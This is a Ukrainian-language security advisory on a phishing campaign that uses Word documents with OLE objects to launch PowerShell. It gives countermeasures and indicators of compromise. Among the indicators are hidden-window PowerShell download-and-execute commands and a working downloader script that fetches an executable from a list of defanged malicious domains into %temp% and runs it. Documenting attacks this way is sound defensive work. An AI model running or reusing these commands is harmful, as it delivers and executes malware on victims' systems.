email > .doc (OLE - LNK - PS) > запитання1? > powershell > GET URL list > GET payload1 > %temp%\*1.exe > GET encoded payload2 > %temp%\*2.exe

* Із схеми викинули проміжне звернення до CMD, команди на завантаження переліку адрес іде напряму з winword на powershell

Принцип дії простий – при відкритті документу жертва бачить прохання клікнути двічі на зображенні

(зображення може бути інакшим – не прив’язуйтеся саме до цієї картинки!)

Подвійний клік спричиняє активацію OLE який видобуває в %tmp% ярлик на виклик powershell із зашитим рядком URL.

Далі усе як раніше. Тільки цього разу без проміжного звернення до cmd.

Контрзаходи:

1) Переконайтеся, що застосували правила для cmd і powershell

2) Блокування доступу до Internet для Powershell (варіант #1)

3) Блокування створення .exe в %temp%

Приклад спрацювання правила на запуск дочірніх процесів:

Маркери компрометації:

Файли з двох різних кампаній.

Invoice INV0000252

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -nop -w hidden -c IEX ((new-object net.webclient).downloadstring([System.Uri]'h11p:\cornertape.net/eiuhf384'))

443051465

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -nop -w hidden -c IEX ((new-object net.webclient).downloadstring([System.Uri]'h11p:\hispanic-models.com/kjsdch7346'))

За посиланням  – некодований набір інструкцій (їм стало ліньки робити обфускації у проганяти через base64)

Зверніть увагу – запис проміжного payload (downloader) у каталог %temp%

$us = "h11p:\ingress.kannste.net/JHGbdc34","h11p:\givagarden.com/JHGbdc34","h11p:\hotelruota.it/JHGbdc34","h11p:\internet-webshops.de/JHGbdc34","h11p:\hilaryandsavio.com/JHGbdc34","h11p:\cirad.or.id/JHGbdc34"
foreach($u in $us){
Try{
Write-Host $u
$f = "$env:temp\h8.exe"
Write-Host $f
$w = New-Object System.Net.WebClient
$w.DownloadFile($u, $f)
Start-Process $f
break
}Catch{}}

Будьте уважні та обережні!

VR